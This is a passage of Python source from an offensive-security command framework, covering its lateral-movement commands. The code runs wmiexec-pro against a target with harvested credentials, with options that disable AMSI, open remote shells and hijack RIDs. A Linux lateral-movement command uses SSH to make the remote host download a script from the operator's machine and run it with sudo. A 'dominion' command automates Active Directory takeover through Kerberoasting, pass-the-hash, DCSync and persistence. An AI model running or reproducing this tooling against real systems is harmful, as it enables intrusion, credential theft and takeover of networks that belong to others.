                self.upload_file_to_c2(line)
            elif nparts == 2:
                user = parts[0]
                path_file = parts[1]
                print_msg(f"implant: {user} file: {path_file} ")
                response = self.upload_file_to_c2(path_file, user)
                print(response)
            else:
                print_error("Error")
        else:
            print("else")
            line = input ("    [!] Enter the path: ") or 'puertos'
            self.upload_file_to_c2(line)

    @cmd2.with_category("08. Lateral Movement")
    def do_wmiexecpro(self, line):
        """
        Executes wmiexec-pro with various options for WMI operations.

        This function handles the installation of wmiexec-pro and its dependencies,
        and allows the user to execute various WMI operations with minimal input.
        It reads credentials from a specified file and constructs the necessary
        commands to interact with the target system.

        :param line: Command line input from the user. This input is used to
                    determine the module and action to be executed.
        :returns: None

        The function performs the following steps:
        1. Checks if wmiexec-pro and its dependencies are installed. If not, it
        installs them in specified directories.
        2. Reads credentials from a file.
        3. Constructs and executes the wmiexec-pro command based on user input.
        4. Enumerates available modules and actions for each module, allowing the
        user to select them interactively.
        5. Enumerates available options for each action, allowing the user to select
        them interactively.

        Example usage:
        ```
        do_wmiexecpro("enum -run")
        ```

        This will execute the enumeration module with the `-run` action.

        If no specific command is provided, the function will prompt the user to
        select a module and action interactively.
        """
        path = os.getcwd()
        impacket_repo = "https://github.com/fortra/impacket.git"
        wmiexecpro_repo = "https://github.com/XiaoliChan/wmiexec-Pro.git"
        impacket_path = os.path.join(path, "external", ".exploit", "impacket")
        wmiexecpro_path = os.path.join(path, "external", ".exploit", "impacket", "wmiexec-Pro")

        def install_wmiexecpro():
            try:
                if not os.path.exists(impacket_path):
                    print_msg("Impacket is not installed. Installing...")
                    self.cmd(f"git clone {impacket_repo} {impacket_path}")
                    self.cmd(f"cd {impacket_path} && sudo pip3 install .")

                if not os.path.exists(wmiexecpro_path):
                    print_msg("wmiexec-pro is not installed. Installing...")
                    self.cmd(f"git clone {wmiexecpro_repo} {wmiexecpro_path}")

                print_msg("Installation completed.")
            except Exception as e:
                print_error(f"An error occurred during installation: {e}")

        if not is_binary_present("wmiexec-pro.py"):
            install_wmiexecpro()

        rhost = self.params['rhost']
        domain = self.params['domain']

        path_cred = get_credentials(True)

        if not os.path.exists(path_cred):
            print_error("Credentials file not found. Please ensure the credentials file exists.")
            return

        with open(path_cred) as file:
            for file_line in file:
                params = file_line.split(":")
                username = params[0]
                password = params[1].replace("\n", "")

                if line:
                    command_parts = line.split()
                    module = command_parts[0]
                    action = command_parts[1] if len(command_parts) > 1 else ""
                    options = command_parts[2:]

                    command = f"python3 {wmiexecpro_path}/wmiexec-pro.py {self.params['domain']}\\{username}:{password}@{self.params['rhost']} {module}"

                    if action:
                        command += f" {action}"

                    if options:
                        command += " " + " ".join(options)

                    self.cmd(command)
                    return

                print_warn("Select the module you want to use:")
                modules = [
                    "enum", "amsi", "exec-command", "filetransfer", "rdp", "winrm",
                    "firewall", "service", "eventlog", "rid-hijack"
                ]
                for i, module in enumerate(modules, start=1):
                    print_msg(f"{i}. {module}")

                try:
                    module_choice = int(input("    [!] Enter the number corresponding to the module: ")) - 1
                    if module_choice < 0 or module_choice >= len(modules):
                        print_error("Invalid choice. Please select a valid number.")
                        return

                    module = modules[module_choice]
                    actions = {
                        "enum": ["-run"],
                        "amsi": ["-enable", "-disable"],
                        "exec-command": ["-shell", "-command", "-silent", "-old", "-save", "-clear"],
                        "filetransfer": ["-upload", "-download", "-clear"],
                        "rdp": ["-enable", "-enable-old", "-enable-ram", "-disable", "-disable-old", "-disable-ram"],
                        "winrm": ["-enable", "-disable"],
                        "firewall": ["-search-port", "-dump", "-rule-id", "-firewall-profile"],
                        "service": ["-action", "-dump"],
                        "eventlog": ["-risk-i-know", "-retrive"],
                        "rid-hijack": ["-user", "-action", "-hijack-rid", "-blank-pass-login", "-remove", "-restore"]
                    }

                    print_warn(f"Select the action for {module}:")
                    for j, action in enumerate(actions[module], start=1):
                        print_msg(f"{j}. {action}")

                    action_choice = int(input("    [!] Enter the number corresponding to the action: ")) - 1
                    if action_choice < 0 or action_choice >= len(actions[module]):
                        print_error("Invalid choice. Please select a valid number.")
                        return

                    action = actions[module][action_choice]

                    options_dict = {
                        "enum": {
                            "-run": []
                        },
                        "amsi": {
                            "-enable": [],
                            "-disable": []
                        },
                        "exec-command": {
                            "-shell": [],
                            "-command": ["-command", "-silent", "-old", "-save"],
                            "-silent": [],
                            "-old": [],
                            "-save": [],
                            "-clear": []
                        },
                        "filetransfer": {
                            "-upload": ["-src-file", "-dest-file"],
                            "-download": ["-src-file", "-dest-file"],
                            "-clear": []
                        },
                        "rdp": {
                            "-enable": [],
                            "-enable-old": [],
                            "-enable-ram": [],
                            "-disable": [],
                            "-disable-old": [],
                            "-disable-ram": []
                        },
                        "winrm": {
                            "-enable": [],
                            "-disable": []
                        },
                        "firewall": {
                            "-search-port": ["-port"],
                            "-dump": [],
                            "-rule-id": ["-action"],
                            "-firewall-profile": ["-action"]
                        },
                        "service": {
                            "-action": ["-service-name", "-display-name", "-bin-path", "-class"],
                            "-dump": []
                        },
                        "eventlog": {
                            "-risk-i-know": [],
                            "-retrive": ["-object-ID"]
                        },
                        "rid-hijack": {
                            "-user": ["-action", "-hijack-rid"],
                            "-action": ["-user"],
                            "-hijack-rid": ["-user"],
                            "-blank-pass-login": ["-enable", "-disable"],
                            "-remove": ["-user"],
                            "-restore": ["-backup-file"]
                        }
                    }

                    options = []
                    if options_dict[module][action]:
                        print_warn(f"Select the options for {action}:")
                        for k, option in enumerate(options_dict[module][action], start=1):
                            print_msg(f"{k}. {option}")

                        while True:
                            try:
                                option_choice = int(input("    [!] Enter the number corresponding to the option (or 0 to finish): ")) - 1
                                if option_choice == -1:
                                    break
                                if option_choice < 0 or option_choice >= len(options_dict[module][action]):
                                    print_error("Invalid choice. Please select a valid number.")
                                    continue
                                option_value = input(f"    [!] Enter the value for {options_dict[module][action][option_choice]}: ").strip()
                                options.append(f"{options_dict[module][action][option_choice]} {option_value}")
                            except ValueError:
                                print_error("Invalid input. Please enter a valid number.")

                    command = f"python3 {wmiexecpro_path}/wmiexec-pro.py {self.params['domain']}\\{username}:{password}@{self.params['rhost']} {module} {action}"
                    if options:
                        command += " " + " ".join(options)

                    print_msg(f"Running wmiexec-pro with command: {command}")
                    self.cmd(command)

                except ValueError:
                    print_error("Invalid input. Please enter a valid number.")
                return

    @cmd2.with_category("08. Lateral Movement")
    def do_lateral_mov_lin(self, line):
        """
        Perform lateral movement by downloading and installing LazyOwn on a remote Linux machine.

        This function automates the process of setting up an APT and PIP proxy, downloading the LazyOwn package,
        transferring it to a remote machine, and installing it. The function ensures that all necessary directories
        are created and that the package is correctly installed on the remote machine.

        Parameters:
            line (str): The command line input, which is not used in this function.

        Returns:
            None
        """

        print_error("Downloading LazyOwn" + self.url_download)

        version = self.version.replace("/","-")
        name = "LazyOwn_CRIMEN.tar.gz"
        rhost = self.params['rhost']
        lhost = self.params['lhost']
        tmp = "/tmp/lazyown_atomic_test"
        self.cmd(f"mkdir -p {tmp}")
        sessions = f"{self.path}/sessions/"
        self.onecmd("apt_proxy remote")
        self.onecmd("pip_proxy remote")
        if not os.path.exists(f"{sessions}/{name}"):
            command = f"cd {sessions} && wget -O {name} --header='Accept: application/gzip' {self.url_download}"
            self.cmd(command)
        command_remote = f"wget -O {name} http://{self.params['lhost']}/{name}"
        username = self.params.get("start_user", "CHANGE_ME")
        password = self.params.get("start_pass", "CHANGE_ME")
        if username == "CHANGE_ME" or password == "CHANGE_ME":
            print_error("start_user and start_pass must be configured in payload.json")
            return
        import os as _os
        from core.hardening import set_sshpass_env
        _env = set_sshpass_env(password)
        ssh_args = [
            "sshpass", "-e", "ssh", f"{username}@{self.params['rhost']}",
            f"mkdir -p {tmp} ; cd {tmp} ; {command_remote} ; "
            f"if [ ! -s {name} ]; then echo 'Error: File is empty'; exit 1; fi ; "
            f"tar -vzxf {name} ; "
            f"echo \"{password}\" | sudo -S curl http://{self.params['lhost']}/r -o r ; "
            f"sh r &"
        ]
        subprocess.run(ssh_args, shell=False, env=_env, check=False)
        ssh_install_args = [
            "sshpass", "-e", "ssh", f"{username}@{self.params['rhost']}",
            f"cd {tmp}/LazyOwn-{version} ; echo \"{password}\" | sudo -S bash install.sh &"
        ]
        subprocess.run(ssh_install_args, shell=False, env=_env, check=False)
        return

    @cmd2.with_category("08. Lateral Movement")
    def do_addcli(self, line):
        """
        Add a client to execute c2 commands

        Parameters:
            line (str): The command line input, which is not used in this function.

        Returns:
            None
        """
        if not line:
            line = input("    [!] Enter the client_id (default: no_priv): ") or 'no_priv'
        self.c2_clientid = line.strip()

    @cmd2.with_category("08. Lateral Movement")
    def do_dominion(self, line):
        """Execute a fully automated Active Directory domain takeover.

        Runs the complete AD kill-chain: domain enumeration, user discovery,
        credential extraction (AS-REP roasting, Kerberoasting), lateral movement
        via PsExec/WMIExec/Pass-the-Hash, DCSync privilege escalation, and
        persistence mechanisms.

        Usage:
            dominion <domain> <dc_ip> [username] [password]
            dominion corp.local 10.10.11.5
            dominion corp.local 10.10.11.5 admin Password123!
            dominion corp.local 10.10.11.5 admin :ntlm_hash

        All credentials, sessions, and findings are persisted under
        ``sessions/``. Use ``creds`` to view captured credentials afterwards.

        :param line: Domain, DC IP, optional credentials.
        :type line: str
        :return: None
        """
        parts = line.strip().split()
        if len(parts) < 2:
            print_error("Usage: dominion <domain> <dc_ip> [username] [password]")
            return

        domain = parts[0]
        dc_ip = parts[1]
        username = parts[2] if len(parts) > 2 else ""
        password = parts[3] if len(parts) > 3 else ""
        ntlm_hash = parts[4] if len(parts) > 4 else ""

        try:
            from modules.domain_dominance import DomainDominance

            dd = DomainDominance()
            print_msg(f"Starting domain dominance operation against {domain} (DC: {dc_ip})")
            print_msg("Phases: domain_recon -> user_enum -> credential_extraction -> lateral_movement -> privilege_escalation -> persistence")  # noqa: E501
            result = dd.dominate(
                domain=domain,
                dc_ip=dc_ip,
                username=username,
                password=password,
                ntlm_hash=ntlm_hash,
            )
            print_msg(f"Dominance complete for {result.domain}")
            print_msg(f"  Compromised: {result.compromised}")
            print_msg(f"  Domain Admin obtained: {result.domain_admin_obtained}")
            print_msg(f"  DCSync performed: {result.dcsynced}")
            print_msg(f"  Users enumerated: {result.users_extracted}")
            print_msg(f"  Credentials stolen: {result.creds_stolen}")
            print_msg(f"  Sessions obtained: {result.sessions_obtained}")
            for phase, status in result.phase_results.items():
                print_msg(f"  Phase [{phase}]: {status}")
            if result.errors:
                for err in result.errors:
                    print_error(f"  Error: {err}")
            self.display_toastr(f"Domain {domain} dominated: {result.domain_admin_obtained}", type="success")
        except ImportError as exc:
            print_error(f"domain_dominance module not available: {exc}")
        except Exception as exc:
            print_error(f"Dominion operation failed: {exc}")


import utils as _lazy_utils
for _lazy_name in dir(_lazy_utils):
    if not _lazy_name.startswith('_'):
        globals().setdefault(_lazy_name, getattr(_lazy_utils, _lazy_name))
del _lazy_utils, _lazy_name
__all__ = ["LateralMigratedCommandSet"]
